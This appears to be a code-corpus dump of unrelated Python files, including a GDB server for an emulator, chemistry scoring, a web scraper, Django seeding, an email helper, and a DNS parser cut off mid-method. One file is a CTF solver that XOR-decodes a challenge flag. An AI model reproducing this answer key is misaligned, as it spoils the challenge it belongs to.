STOP_POLL_TIME = 0.25
HOOK_TYPE_TO_STOP_REASON = {
HookType.CODE: 'hwbreak',
HookType.WRITE: 'watch',
HookType.READ: 'rwatch',
HookType.ACCESS: 'awatch'
}
ERROR_RESPONSE = b'E01'
OK_RESPONSE = b'OK'
GDB_TYPE_TO_HOOK_TYPE = {
0: HookType.CODE,
1: HookType.CODE,
2: HookType.WRITE,
3: HookType.READ,
4: HookType.ACCESS
}
class ServerStopReason(enum.Enum):
STOPPED = enum.auto()
KILLED = enum.auto()
DETACHED = enum.auto()
@dataclasses.dataclass
class _MonitorCommand(abc.ABC):
name: str
handler: callable
help: str
class GDBServer:
"""GDB Server implementation. Exposes a Debugger to external GDB clients."""
def __init__(self, dbg: Debugger, port=1234, host='localhost'):
if not dbg.arch.gdb_supported:
raise UnsupportedError('Architecture doesn\'t support GDB')
self.dbg = dbg
self.stop_reason: ServerStopReason = None
self._regs = load_gdb_regs(dbg.arch)
self._server = TCPStreamServer(host, port)
self._stopped = threading.Event()
self._listening = threading.Event()
self._cmd_stop_reason: ServerStopReason = None
self._cpu_stop_reason: StopReason = None
self._stop_exception: CPUError = None
self._hooks = {} #HookType => address => Hook
self._handlers = {
b'?': self._handle_stop_reason,
b'D': self._handle_detach,
b'k': self._handle_kill,
b'qAttached': self._handle_attached,
b'qSupported': self._handle_supported,
b'qXfer:features:read:target.xml:': self._handle_read_features,
b'qXfer:memory-map:read::': self._handle_read_memory_map,
b'g': self._handle_read_regs,
b'G': self._handle_write_regs,
b'm': self._handle_read_mem,
b'M': self._handle_write_mem,
b's': self._handle_step,
b'c': self._handle_continue,
b'S': self._handle_step_signal,
b'C': self._handle_continue_signal,
b'Z': self._handle_add_breakpoint,
b'z': self._handle_remove_breakpoint,
b'qRcmd,' : self._handle_monitor_command
}
self._monitor_commands = [
_MonitorCommand('help', self._handle_help, 'Print a list of monitor commands.'),
_MonitorCommand('megastone', self._handle_megastone, 'Check whether the server is a Megastone server.'),
_MonitorCommand('segments', self._handle_segments, 'Print the list of Segments.'),
_MonitorCommand('info', self._handle_info, 'Print information about the Megastone configuration.'),
_MonitorCommand('error', self._handle_error, 'Print information about the last CPU error.'),
_MonitorCommand('endian', self._handle_endian, 'Print the endian of the server.')
]
def run(self, *, persistent=False):
"""Run the server. Blocks until the client exists or an error occurs."""
self._stopped.clear()
self._server.initialize()
self._listening.set()
with self._server:
self._server.set_timeout(STOP_POLL_TIME)
while True:
reason = self._run_once()
if reason is ServerStopReason.STOPPED or reason is ServerStopReason.KILLED or not persistent:
self.stop_reason = reason
break
self._listening.clear()
def stop(self):
"""
Stop the server.
This can be safely called from a different thread than the one running the server.
"""
self._stopped.set()
def _run_once(self):
conn = self._wait_for_connection()
if conn is None:
return ServerStopReason.STOPPED
with conn:
return self._main_loop(conn)
def _wait_for_connection(self):
logger.info('waiting for client connection')
while True:
try:
stream = self._server.get_stream()
except TimeoutError:
if self._check_stopped():
return None
else:
return RSPConnection(stream)
def _main_loop(self, conn: RSPConnection):
self._cmd_stop_reason = None
while True:
try:
command = conn.receive_packet(timeout=STOP_POLL_TIME)
except EndOfStreamError:
logger.warning('client disconnected')
return ServerStopReason.DETACHED
if self._check_stopped():
return ServerStopReason.STOPPED
if command is None:
continue
logger.debug(f'received packet: {command}')
response = self._handle_command(command)
if response is not None:
logger.debug(f'sending response: {response}')
conn.send_packet(response)
if self._cmd_stop_reason is not None:
return self._cmd_stop_reason
def _handle_command(self, command):
for prefix, handler in self._handlers.items():
if command.startswith(prefix):
args = command[len(prefix):]
return handler(args)
return b''
def _check_stopped(self):
if self._stopped.is_set():
logger.info('server stopped by thread')
return True
return False
def _handle_stop_reason(self, args):
return self._get_stop_response()
def _handle_detach(self, args):
logger.info('client detached')
self._cmd_stop_reason = ServerStopReason.DETACHED
return b'OK'
def _handle_kill(self, args):
logger.info('killed by client')
self._cmd_stop_reason = ServerStopReason.KILLED
return None
def _handle_attached(self, args):
return b'1'
def _handle_read_regs(self, args):
return self._encode_regs()
def _handle_write_regs(self, args):
self._parse_regs(args)
return OK_RESPONSE
def _handle_read_mem(self, args):
address, size = parse_hexint_list(args, 2)
try:
data = self.dbg.mem.read(address, size)
except MemoryAccessError as e:
logger.error(str(e))
return ERROR_RESPONSE
return encode_hex(data)
def _handle_write_mem(self, args):
addresses, hex_data = parse_list(args, 2, b':')
address, _ = parse_hexint_list(addresses, 2)
data = parse_hex(hex_data)
logger.info(f'Write memory: 0x{address:X} +0x{len(data):X}')
try:
self.dbg.mem.write(address, data)
except MemoryAccessError as e:
logger.error(str(e))
return ERROR_RESPONSE
return OK_RESPONSE
def _handle_continue(self, args):
return self._handle_run(args, None)
def _handle_step(self, args):
return self._handle_run(args, 1)
def _handle_add_breakpoint(self, args):
type, address, size = self._parse_hook(args)
logger.debug(f'adding hook: {type} 0x{address:X} +0x{size:X}')
hook = self.dbg.add_breakpoint(address, size, type)
self._add_hook(hook)
return OK_RESPONSE
def _handle_remove_breakpoint(self, args):
type, address, _ = self._parse_hook(args)
logger.debug(f'remove hook: {type} 0x{address:X}')
hook = self._pop_hook(type, address)
self.dbg.remove_hook(hook)
return OK_RESPONSE
def _handle_continue_signal(self, args):
return self._handle_run_signal(args, None)
def _handle_step_signal(self, args):
return self._handle_run_signal(args, 1)
def _handle_run_signal(self, args, count):
_, _, address = args.partition(b';')
return self._handle_run(address, count)
def _handle_run(self, args, count):
if len(args) == 0:
address = None
else:
address = parse_hex_int(args)
self._cpu_stop_reason = None
self._stop_exception = None
logger.debug(f'run: address={address}, count={count}')
try:
self._cpu_stop_reason = self.dbg.run(count=count, address=address)
except CPUError as e:
self._stop_exception = e
logger.info(f'stopped: {e}')
else:
logger.debug(f'stopped: {self._cpu_stop_reason.type.name}')
return self._get_stop_response()
def _handle_supported(self, args):
return b'swbreak+;hwbreak+;qXfer:features:read+;qXfer:memory-map:read+;multiprocess-'
def _handle_read_features(self, args):
features = f'<target version="1.0"><architecture>{self.dbg.arch.gdb_name}</architecture></target>'
file = io.BytesIO(features.encode())
return self._handle_xfer(file, args)
def _handle_read_memory_map(self, args):
file = io.BytesIO()
if isinstance(self.dbg.mem, SegmentMemory):
self._build_memory_map(file)
return self._handle_xfer(file, args)
def _build_memory_map(self, fileobj):
assert isinstance(self.dbg.mem, SegmentMemory)
fileobj.write(b'<memory-map>')
for segment in self.dbg.mem.segments:
fileobj.write(f'<memory type="ram" start="0x{segment.address:x}" length="0x{segment.size:x}"/>'.encode())
fileobj.write(b'</memory-map>')
def _handle_xfer(self, fileobj, args):
offset, length = parse_hexint_list(args, 2)
fileobj.seek(offset)
data = fileobj.read(length)
if len(data) < length:
return b'l' + data
return b'm' + data
def _add_hook(self, hook):
address_hooks = self._hooks.setdefault(hook.type, {})
address_hooks[hook.address] = hook
def _pop_hook(self, type, address):
if type not in self._hooks or address not in self._hooks[type]:
raise ParsingError(f'Hook of type {type} does not exist at 0x{address:X}')
return self._hooks[type].pop(address)
def _parse_hook(self, args):
type, address, size = parse_hexint_list(args, 3)
htype = GDB_TYPE_TO_HOOK_TYPE.get(type)
if htype is None:
raise ParsingError(f'Invalid hook type {type}')
if size == 0:
size = 1
return htype, address, size
def _get_stop_response(self):
info = ''
if self._stop_exception is None:
signum = Signal.SIGTRAP
if self._cpu_stop_reason is not None:
info = self._get_stop_info(self._cpu_stop_reason)
elif isinstance(self._stop_exception, MemFaultError):
signum = Signal.SIGSEGV
elif isinstance(self._stop_exception, InvalidInsnError):
signum = Signal.SIGILL
else:
signum = Signal.SIGABRT
return f'T{signum.value:02X}{info}'.encode()
def _get_stop_info(self, reason: StopReason):
if reason.type is not StopType.HOOK:
return ''
hook = reason.hook
key = HOOK_TYPE_TO_STOP_REASON.get(hook.type)
if key is None:
return ''
if hook.type.is_data:
value = f'{hook.address:X}'
else:
value = ''
return f'{key}:{value};'
def _encode_reg(self, gdb_reg):
if gdb_reg.is_dummy:
value = 0
else:
value = self.dbg.regs[gdb_reg.name]
return self.dbg.arch.endian.encode_int(value, gdb_reg.size)
def _parse_reg(self, data):
return self.dbg.arch.endian.decode_int(data)
def _encode_regs(self):
reg_data = b''.join(self._encode_reg(reg) for reg in self._regs)
return encode_hex(reg_data)
def _parse_regs(self, data):
stream = io.BytesIO(parse_hex(data))
for reg in self._regs:
reg_data = stream.read(reg.size)
if len(reg_data) < reg.size:
raise ParsingError('Received register packet is too short')
if reg.is_dummy:
continue
value = self._parse_reg(reg_data)
if value != self.dbg.regs[reg.name]:
logger.debug(f'Setting register {reg.name} to 0x{value:X}')
self.dbg.regs[reg.name] = value
def _handle_monitor_command(self, args):
cmd = parse_ascii(parse_hex(args))
response = self._handle_monitor_command_string(cmd) + '\n'
return encode_hex(response.encode())
def _handle_monitor_command_string(self, s):
if s == '':
s = 'help'
commands = [cmd for cmd in self._monitor_commands if cmd.name.startswith(s)]
if len(commands) == 0:
return f'Unknown monitor command {s}. Type "monitor help" for a list of commands.'
elif len(commands) > 1:
names = ', '.join(cmd.name for cmd in commands)
return f'Ambiguous monitor command {s}: could be {names}.'
else:
logger.debug(f'monitor command: {commands[0].name}')
return commands[0].handler()
def _handle_help(self):
lines = ['Megastone monitor commands:']
for command in self._monitor_commands:
lines.append(f'{command.name} - {command.help}')
return '\n'.join(lines)
def _handle_megastone(self):
return 'true'
def _handle_segments(self):
if not isinstance(self.dbg.mem, SegmentMemory):
return 'Current Memory doesn\'t support segments.'
segs = sorted(self.dbg.mem.segments, key=lambda s: s.start)
if len(segs) == 0:
return 'No segments information is available.'
addr_width = _get_field_width((seg.address for seg in segs), 'Address')
size_width = _get_field_width((seg.size for seg in segs), 'Size')
lines = [f'{"Address":{addr_width}} {"Size":{size_width}} Perms Name']
for seg in segs:
lines.append(f'{seg.address:#{addr_width}x} {seg.size:#{size_width}x} {seg.perms:<5} {seg.name}')
return '\n'.join(lines)
def _handle_info(self):
return (
f'Architecture: {self.dbg.arch.name}\n'
f'InstructionSet: {self.dbg.isa.name}\n'
f'Endian: {self.dbg.arch.endian.name.lower()}\n'
f'Debugger class: {self.dbg.__class__.__name__}\n'
f'Memory class: {self.dbg.mem.__class__.__name__}\n'
f'Server address: {self._server.host}:{self._server.port}'
)
def _handle_error(self):
if self._stop_exception is None:
return 'No CPU error occurred.'
return str(self._stop_exception)
def _handle_endian(self):
return self.dbg.arch.endian.name
def _get_field_width(values, title):
max_value = max(values)
max_size = round_up(max_value.bit_length(), 4) // 4
return max(len(title), max_size + 2) | 1.585938 | 2 |
scoring/clogp.py | MauriceKarrenbrock/reinvent-memory | 0 | 49796 | <gh_stars>0
# coding=utf-8
from typing import List
import numpy as np
from rdkit import Chem
from rdkit.Chem import rdMolDescriptors
class clogp(object):
""" Optimize strutures to have a predicted clogP within a particular range"""
def __init__(self, range: str):
try:
numbers = list(map(float, range.split("-")))
except:
raise ValueError("clogp needs to be a valid float number or a valid range like: 2.0-3.0")
if len(numbers) == 1:
self.clogp = (numbers,numbers)
else:
self.clogp = (numbers[0], numbers[1])
def __call__(self, smiles: List[str]) -> dict:
mols = [Chem.MolFromSmiles(smile) for smile in smiles]
valid = [1 if mol is not None else 0 for mol in mols]
valid_idxs = [idx for idx, boolean in enumerate(valid) if boolean == 1]
valid_mols = [mols[idx] for idx in valid_idxs]
clogp = [ self.calcLogP(mol) for mol in valid_mols ]
logp_score = [self.score_clogp(ele) for ele in clogp]
score = np.full(len(smiles), 0, dtype=np.float32)
for idx, value in zip(valid_idxs, logp_score):
score[idx] = value
#return {"total_score": np.array(score, dtype=np.float32), "clogp": clogp}
return {"total_score": np.array(score, dtype=np.float32)}
def calcLogP(self, mol):
try:
return rdMolDescriptors.CalcCrippenDescriptors(mol)[0]
except:
return None
def score_clogp(self, clogp):
if clogp is None:
return 0
else:
if clogp < self.clogp[0]:
min_distance = abs(self.clogp[0] - clogp)
else: #greater equal than lower bound
if clogp <= self.clogp[1]: #right in the boundary
return 1
else:
distance_to_lower_bound = abs(self.clogp[0] - clogp)
distance_to_upper_bound = abs(self.clogp[1] - clogp)
min_distance = min(distance_to_lower_bound, distance_to_upper_bound)
#transfor distance to score between 0 and 1
return 1 - np.tanh(min_distance) | 2.453125 | 2 |
facet/network/__init__.py | edponce/FACET | 2 | 49924 | from .client import SocketClient
from .server import (
SocketServer,
SocketServerHandler,
)
| 0.384766 | 0 |
rev/rev-verybabyrev/solve.py | NoXLaw/RaRCTF2021-Challenges-Public | 2 | 50052 | af = list(b"\x13\x13\x11\x17\x12\x1d\x48\x45\x45\x41\x0b\x26\x2c\x42\x5f\x09\x0b\x5f\x6c\x3d\x56\x56\x1b\x54\x5f\x41\x45\x29\x3c\x0b\x5c\x58\x00\x5f\x5d\x09\x54\x6c\x2a\x40\x06\x06\x6a\x27\x48\x42\x5f\x4b\x56\x42\x2d\x2c\x43\x5d\x5e\x6c\x2d\x41\x07\x47\x43\x5e\x31\x6b\x5a\x0a\x3b\x6e\x1c\x49\x54\x5e\x1a\x2b\x34\x05\x5e\x47\x28\x28\x1f\x11\x26\x3b\x07\x50\x04\x06\x04\x0d\x0b\x05\x03\x48\x77\x0a")
flag = "r"
char = "r"
for stuff in af:
flag += chr(ord(char) ^ stuff)
char = flag[-1]
print(flag)
| 1.085938 | 1 |
CBCS_Tickets/apps.py | tjdolan121/tickets | 1 | 50180 | <gh_stars>1-10
from django.apps import AppConfig
class CbcsTicketsConfig(AppConfig):
name = 'CBCS_Tickets'
| 0.53125 | 1 |
releaseherald/releaseherald/plugins/hookspecs.py | Morgan-Stanley/Testplan | 0 | 50308 | <gh_stars>0
from typing import List, Dict, Any
import pluggy
from git import Repo, Tag
from releaseherald.configuration import Configuration
from releaseherald.plugins import CommitInfo
from releaseherald.plugins.interface import (
MutableProxy,
VersionNews,
News,
Output,
CommandOptions,
)
hookspec = pluggy.HookspecMarker("releaseherald")
@hookspec
def process_config(config: Configuration):
"""
Called as the first callback to the plugin. It can use this to
initiate itself based in the configuration read from the config file.
If also has a chance to change the configuration. It can for example
parse and validate it's own sub configuration and replace the dict in `config`
with a more manageable object.
Args:
config: The configuration
"""
pass
@hookspec
def get_command_options(command: str) -> CommandOptions:
"""
This callback give chance to a plugin to add commandline options to
various commands. It is called with the name of the command.
Args:
command: something
Returns:
collection of `click.Options` that are added to the cli command
and a callable that can set the configured value as the default for the
cli option"""
pass
@hookspec
def on_start_command(command: str, kwargs: Dict[str, Any]):
"""
Called before a cli command start to execute.
Args:
command: the name of the command
kwargs: the parameters the command called with
"""
pass
@hookspec
def process_tags(repo: Repo, tags: List[Tag]):
"""
Args:
repo: the git repository
tags:
List of tags releaseherald consider as the versions
it needs to collect newsfragments. The plugin is free
to manipulate the list of tags complex filtering can be
implemented here.
"""
pass
@hookspec
def process_commits(repo: Repo, tags: List[Tag], commits: List[CommitInfo]):
"""
The aim of this hook is to collect the list of commits based on the tags.
The plugin supposed to modify the `commits` list. The default plugin, just
turns the tags into [CommitInfo][releaseherald.plugins.interface.CommitInfo].
Args:
repo: the git repository
tags: the tags collected by [process_tags][releaseherald.plugins.hookspecs.process_tags]
commits: Info about each commits
"""
pass
@hookspec
def get_news_between_commits(
repo: Repo,
commit_from: CommitInfo,
commit_to: CommitInfo,
news: List[News],
):
"""
In this hook the plugin can alter the collected `news` between the two commits. It is
called for every consecutive commit pairs processed by
[process_commits][releaseherald.plugins.hookspecs.process_commits].
Args:
repo: the git repository
commit_from: The earlier commit
commit_to: The later commit
news: The list of news that previous plugins collected, can be altered by the plugin
"""
pass
@hookspec
def get_version_news(
repo: Repo,
commit_from: CommitInfo,
commit_to: CommitInfo,
news: List[News],
version_news: MutableProxy[VersionNews],
):
"""
In this hook plugins can produce a wrapper around the the list of news that represent a
version in releaseherald datastructure. Called for every consecutive commit pairs processed by
[process_commits][releaseherald.plugins.hookspecs.process_commits] with the news processed by
[get_news_between_commits][releaseherald.plugins.hookspecs.get_news_between_commits] for the
same two commits.
Args:
repo: the git repository
commit_from: The earlier commit
commit_to: The later commit
news: The list of news collected by
[get_news_between_commits][releaseherald.plugins.hookspecs.get_news_between_commits]
version_news: The version news representing a version with the changes between two commits
"""
pass
@hookspec
def process_version_news(version_news: List[VersionNews]):
"""
This hook give a chance for the plugin to alter the list of versions.
Args:
version_news: All the version/news collected so far
"""
pass
@hookspec
def generate_output(
version_news: List[VersionNews], output: MutableProxy[Output]
):
"""
The plugin can generate an output in memory in any kind of format it want. It also has a
chance to alter or replace an output generated by any previous plugins
Args:
version_news:
All the version/news collected and processed by
[process_version_news][releaseherald.plugins.hookspecs.process_version_news]
output: Output in plugin specific format
"""
pass
@hookspec
def write_output(output: Output):
"""
The plugin should do its final output step here. Write to file, to stdout or send a mail,
upload to some service whatever desired.
Args:
output: the output from [generate_output][releaseherald.plugins.hookspecs.generate_output]
"""
pass
| 1.867188 | 2 |
spiders/a505.py | senlyu163/crawler | 0 | 50436 | <reponame>senlyu163/crawler<filename>spiders/a505.py
# -*- coding: utf-8 -*-
import scrapy
from scrapy.linkextractors import LinkExtractor
from scrapy.spiders import CrawlSpider, Rule
from ..utils import extract_CN_from_content
from ..items import ScrapySpiderItem
import re
class A505Spider(CrawlSpider):
name = '505'
allowed_domains = ['xxgk.gangu.gov.cn']
start_urls = ['http://xxgk.gangu.gov.cn/']
rules = (
Rule(LinkExtractor(allow=r'/index\.php\?m=content&c=index&a=lists&catid=\d+'), follow=True),
Rule(LinkExtractor(allow=r'/index\.php\?m=content&c=index&a=show&catid=\d+&id=\d+'), callback='parse_item', follow=True),
Rule(LinkExtractor(allow=r'index\.php\?m=content&c=index&a=lists&catid=\d+&page=\d+'), follow=True),
# Rule(LinkExtractor(allow=r'Items/'), callback='parse_item', follow=True),
)
def parse_item(self, response):
item = ScrapySpiderItem()
item['url'] = response.url
date = response.xpath('/html/body/table/tr/td/table[5]/tr/td/table[2]/tr/td/span').extract_first()
date = re.search(r"(\d{4}-\d{2}-\d{2})", date).groups()[0]
item['date'] = date
title = response.xpath('/html/body/table/tr/td/table[5]/tr/td/table[1]/tr/td/span/text()').extract_first()
item['title'] = title
contents = response.xpath('/html/body/table/tr/td/table[5]/tr/td/table[5]/tr').extract()
item['contents'] = extract_CN_from_content(contents)
return item
| 1.773438 | 2 |
app/scripts/populate_db.py | spiros-m2/books-rest-api | 0 | 50564 | <gh_stars>0
from django.db import transaction
#
from books import models
from datetime import datetime
@transaction.atomic
def populate_authors():
print("Adding authors...")
authors = [
models.Author(
id=1,
first_name="Kurt",
last_name="Vonnegut",
birthday=datetime(1922, 11, 11),
email="<EMAIL>"
),
models.Author(
id=2,
first_name="Ray",
last_name="Bradbury",
birthday=datetime(1920, 8, 22),
email="<EMAIL>"
),
models.Author(
id=3,
first_name="Isaac",
last_name="Asimov",
birthday=datetime(1920, 1, 2),
email="<EMAIL>"
),
models.Author(
id=4,
first_name="<NAME>.",
last_name="Dick",
birthday=datetime(1928, 12, 16),
email="<EMAIL>"
),
models.Author(
id=5,
first_name="George",
last_name="Orwell",
birthday=datetime(1903, 6, 25),
email="<EMAIL>"
)
]
models.Author.objects.bulk_create(authors)
@transaction.atomic
def populate_publishers():
print("Adding publishers...")
publishers = [
models.Publisher(
id=1,
name="HarperCollins Publishers",
address="London, United Kingdom",
),
models.Publisher(
id=2,
name="Random House USA Inc",
address="New York, United States",
),
models.Publisher(
id=3,
name="Bantam Doubleday Dell Publishing Group Inc",
address="New York, United States"
),
models.Publisher(
id=4,
name="Orion Publishing Co",
address="London, United Kingdom",
),
models.Publisher(
id=5,
name="Penguin Books Ltd",
address="London, United Kingdom",
),
models.Publisher(
id=6,
name="Vintage Publishing",
address="London, United Kingdom",
)
]
models.Publisher.objects.bulk_create(publishers)
@transaction.atomic
def populate_books():
print("Adding books...")
books = [
models.Book(
id=1,
title="Fahrenheit 451",
description = ("Fahrenheit 451 is a 1953 dystopian novel by American writer <NAME>."
"Often regarded as one of his best works, the novel presents a future American society where"
"books are outlawed and firemen burn any that are found."),
isbn="9780006546061",
pub_date=datetime(2019, 2, 7),
author=models.Author.objects.get(id=2),
publisher=models.Publisher.objects.get(id=1)
),
models.Book(
id=2,
title="I, Robot",
description=("I, Robot is a fixup novel of science fiction short stories or essays by"
"American writer <NAME>. The stories originally appeared in the American magazines"
"Super Science Stories and Astounding Science Fiction between 1940 and 1950 and were"
"then compiled into a book for stand-alone publication by Gnome Press in 1950, in an"
"initial edition of 5,000 copies."),
isbn="9780007491513",
pub_date=datetime(2013, 4, 1),
author=models.Author.objects.get(id=3),
publisher=models.Publisher.objects.get(id=1)
),
models.Book(
id=3,
title="Foundation and Empire",
description=("Foundation and Empire is a science fiction novel by American writer <NAME>"
"originally published by Gnome Press in 1952. It is the second book in the Foundation Series,"
"and the fourth in the in-universe chronology."),
isbn="9780553293371",
pub_date=datetime(1997, 4, 1),
author=models.Author.objects.get(id=3),
publisher=models.Publisher.objects.get(id=2)
),
models.Book(
id=4,
title="Foundation And Earth",
description=("Foundation and Earth is a science fiction novel by American writer <NAME>,"
"the fifth novel of the Foundation series and chronologically the last in the series."
"It was published in 1986, four years after the first sequel to the Foundation trilogy,"
"which is titled Foundation's Edge."),
isbn="9780553587579",
pub_date=datetime(2004, 12, 15),
author=models.Author.objects.get(id=3),
publisher=models.Publisher.objects.get(id=1)
),
models.Book(
id=5,
title="Do Androids Dream Of Electric Sheep?",
description=("Do Androids Dream of Electric Sheep? (retitled Blade Runner: Do Androids Dream"
"of Electric Sheep? in some later printings) is a dystopian science fiction novel by American"
"writer <NAME>, first published in 1968."),
isbn="9780575094185",
pub_date=datetime(2017, 11, 20),
author=models.Author.objects.get(id=4),
publisher=models.Publisher.objects.get(id=4)
),
models.Book(
id=6,
title="1984",
description=("Nineteen Eighty-Four: A Novel, often published as 1984, is a dystopian social"
"science fiction novel by English novelist <NAME>. It was published on 8 June 1949"
"by <NAME> as Orwell's ninth and final book completed in his lifetime."),
isbn="9780141036144",
pub_date=datetime(2008, 10, 1),
author=models.Author.objects.get(id=5),
publisher=models.Publisher.objects.get(id=5)
),
models.Book(
id=7,
title="Animal Farm",
description=("Animal Farm is an allegorical novella by <NAME>, first published in"
"England on 17 August 1945. The book tells the story of a group of farm animals who rebel"
"against their human farmer, hoping to create a society where the animals can be equal,"
"free, and happy."),
isbn="9780141036137",
pub_date=datetime(2008, 10, 1),
author=models.Author.objects.get(id=5),
publisher=models.Publisher.objects.get(id=5)
),
models.Book(
id = 8,
title="Cat's Cradle",
description=("Cat's Cradle is a satirical postmodern novel, with science fiction elements,"
"by American writer <NAME>. Vonnegut's fourth novel, it was first published in 1963,"
"exploring and satirizing issues of science, technology, the purpose of religion,"
"and the arms race, often through the use of black humor."),
isbn="9780241951606",
pub_date=datetime(2011, 4, 7),
author=models.Author.objects.get(id=1),
publisher=models.Publisher.objects.get(id=1)
),
models.Book(
id=9,
title="Mother Night",
description=("Mother Night is a novel by American author <NAME>, first published"
"in February 1962. The title of the book is taken from Goethe's Faust. The novel takes the"
"form of the fictional memoirs of Howard <NAME> Jr., an American, who moved to Germany"
"in 1923 at age 11, and later became a well-known playwright and Nazi propagandist."),
isbn="9780099819301",
pub_date=datetime(2019, 3, 5),
author=models.Author.objects.get(id=1),
publisher=models.Publisher.objects.get(id=4)
)
]
models.Book.objects.bulk_create(books)
def run():
try:
populate_authors()
populate_publishers()
populate_books()
except Exception as e:
print(e)
| 1.578125 | 2 |
tron/Hub/Reply/Encoders/RawReplyEncoder.py | sdss/tron | 0 | 50692 | <reponame>sdss/tron
__all__ = ['RawReplyEncoder']
from tron import Misc
from tron.Hub.KV.KVDict import kvAsASCII
from tron.Parsing.dequote import dequote
from .ReplyEncoder import ReplyEncoder
class RawReplyEncoder(ReplyEncoder):
""" Encode Replys without any protocol information.
Options:
EOL - choose the EOL string to use.
keyName - set a single keyword, whose _value_ alone will be returned.
"""
def __init__(self, **argv):
ReplyEncoder.__init__(self, **argv)
# How do we terminate encoded lines?
#
self.EOL = argv.get('EOL', '\n')
self.keyName = argv.get('keyName', None)
def encode(self, r, nub, noKeys=False):
""" Encode a protocol-free reply for a given nub. """
if self.keyName:
rawVal = r.KVs.get(self.keyName, '')
val = dequote(rawVal)
Misc.log('RAWDEQUOTE', 'rawVal=%r val=%r' % (rawVal, val))
else:
val = self.encodeKeys(r.src, r.KVs)
if val:
return '%s%s' % (val, self.EOL)
else:
return ''
def encodeKeys(self, src, KVs):
""" Return a string encoding of KVs stored in an OrderedDict.
Args:
src - ignored
KVs - an OrderedDict of values. See Parsing/parsing.py for important details.
Notes:
"""
if self.debug > 5:
Misc.log('ASCIIReplyEnc.encode', 'encoding %r' % (KVs, ))
if KVs is None:
return ''
keylist = []
for k, v in KVs.items():
if self.debug > 5:
Misc.log('ASCIIReplyEnc.encode', 'encoding %r=%r' % (k, v))
keylist.append(kvAsASCII(k, v))
return '; '.join(keylist)
| 1.484375 | 1 |
sendemail.py | mesperrus/grailed-notifications | 0 | 50820 | # login.txt should contain address on first line and app specific password on the second
#
# <EMAIL>
# <PASSWORD>
def sendEmail(subject, message_):
import smtplib
from email.mime.multipart import MIMEMultipart
from email.mime.text import MIMEText
with open("login.txt") as f:
login = f.read().splitlines()
gmailUser = login[0]
gmailPassword = login[1]
recipient = login[0]
message = message_
msg = MIMEMultipart()
msg['From'] = gmailUser
msg['To'] = recipient
msg['Subject'] = subject
msg.attach(MIMEText(message))
mailServer = smtplib.SMTP('smtp.gmail.com', 587)
mailServer.ehlo()
mailServer.starttls()
mailServer.ehlo()
mailServer.login(gmailUser, gmailPassword)
mailServer.sendmail(gmailUser, recipient, msg.as_string())
mailServer.close() | 1.835938 | 2 |
Linkedin/linkedin-become-a-programmer-foundations/2.programming-foundations-beyond-the-fundamentals/Ch07/07_07/plant.py | mohammedelzanaty/myRoad2BeFullStack | 2 | 50948 | <reponame>mohammedelzanaty/myRoad2BeFullStack
def plant_recommendation(care):
if care == 'low':
print('aloe')
elif care == 'medium':
print('pothos')
elif care == 'high':
print('orchid')
plant_recommendation('low')
plant_recommendation('medium')
plant_recommendation('high')
| 2.1875 | 2 |
dns_messages/dns_objects/dns_message_parser.py | wahlflo/dns-messages | 0 | 51076 | <gh_stars>0
from dns_messages.dns_objects import *
from ..dns_objects.dns_message import DnsMessage, OPCODE, RCODE
from ..utilities import convert_bytes_to_bit_list, extract_int_from_raw_bits, parse_name
RR_TYPE_TO_CLASS_MAPPING = {
RRType.A: A,
RRType.NS: None,
RRType.CNAME: CNAME,
RRType.SOA: SOA,
RRType.PTR: PTR,
RRType.HINFO: HINFO,
RRType.MX: MX,
RRType.TXT: TXT,
RRType.RP: None,
RRType.AFSDB: None,
RRType.SIG: None,
RRType.KEY: None,
RRType.AAAA: AAAA,
RRType.LOC: None,
RRType.SRV: None,
RRType.NAPTR: None,
RRType.KK: None,
RRType.CERT: None,
RRType.DNAME: None,
RRType.APL: None,
RRType.DS: None,
RRType.SSHFP: None,
RRType.IPSECKEY: None,
RRType.RRSIG: None,
RRType.NSEC: None,
RRType.DNSKEY: None,
RRType.DHCID: None,
RRType.NSEC3: None,
RRType.NSEC3PARAM: None,
RRType.TLSA: None,
RRType.SMIMEA: None,
RRType.HIP: None,
RRType.CDS: None,
RRType.CDNSKEY: None,
RRType.OPENPGPKEY: None,
RRType.CSYNC: None,
RRType.ZONEMD: None,
RRType.SVCB: None,
RRType.HTTPS: None,
RRType.EUI48: None,
RRType.EUI64: None,
RRType.TKEY: None,
RRType.TSIG: None,
RRType.URI: None,
RRType.CAA: None,
RRType.TA: None,
RRType.DLV: None,
}
class DnsMessageParser:
def __init__(self, message: bytes):
self._message_in_bytes = message
self._message_in_bits = convert_bytes_to_bit_list(message=message)
self._qd_count = 0
self._an_count = 0
self._ns_count = 0
self._ar_count = 0
self._byte_index = 12
self._parsed_message: DnsMessage = None
def parse_message(self) -> DnsMessage:
self._parsed_message: DnsMessage = self._parse_message_header()
self._parse_question_section()
self._parse_answer_section()
self._parse_authority_section()
self._parse_additional_section()
return self._parsed_message
def _parse_message_header(self) -> DnsMessage:
message_id: int = extract_int_from_raw_bits(raw_bits=self._message_in_bits, bit_offset=0, number_of_bits=16)
qr: int = extract_int_from_raw_bits(raw_bits=self._message_in_bits, byte_offset=2, bit_offset=0, number_of_bits=1)
op_code: OPCODE = OPCODE.from_bits(raw_bits=self._message_in_bits, byte_offset=2, bit_offset=1)
aa: int = extract_int_from_raw_bits(raw_bits=self._message_in_bits, byte_offset=2, bit_offset=5, number_of_bits=1)
tc: int = extract_int_from_raw_bits(raw_bits=self._message_in_bits, byte_offset=2, bit_offset=6, number_of_bits=1)
rd: int = extract_int_from_raw_bits(raw_bits=self._message_in_bits, byte_offset=2, bit_offset=7, number_of_bits=1)
ra: int = extract_int_from_raw_bits(raw_bits=self._message_in_bits, byte_offset=2, bit_offset=8, number_of_bits=1)
z: int = extract_int_from_raw_bits(raw_bits=self._message_in_bits, byte_offset=2, bit_offset=9, number_of_bits=3)
rcode: RCODE = RCODE.from_bits(raw_bits=self._message_in_bits, byte_offset=3, bit_offset=2)
self._qd_count = extract_int_from_raw_bits(raw_bits=self._message_in_bits, byte_offset=4, bit_offset=0, number_of_bits=16)
self._an_count = extract_int_from_raw_bits(raw_bits=self._message_in_bits, byte_offset=6, bit_offset=0, number_of_bits=16)
self._ns_count = extract_int_from_raw_bits(raw_bits=self._message_in_bits, byte_offset=8, bit_offset=0, number_of_bits=16)
self._ar_count = extract_int_from_raw_bits(raw_bits=self._message_in_bits, byte_offset=10, bit_offset=0, number_of_bits=16)
return DnsMessage(message_id=message_id, qr=qr, op_code=op_code, aa=aa, tc=tc, rd=rd, ra=ra, z=z, rcode=rcode)
def _parse_question_section(self) -> None:
for _ in range(self._qd_count):
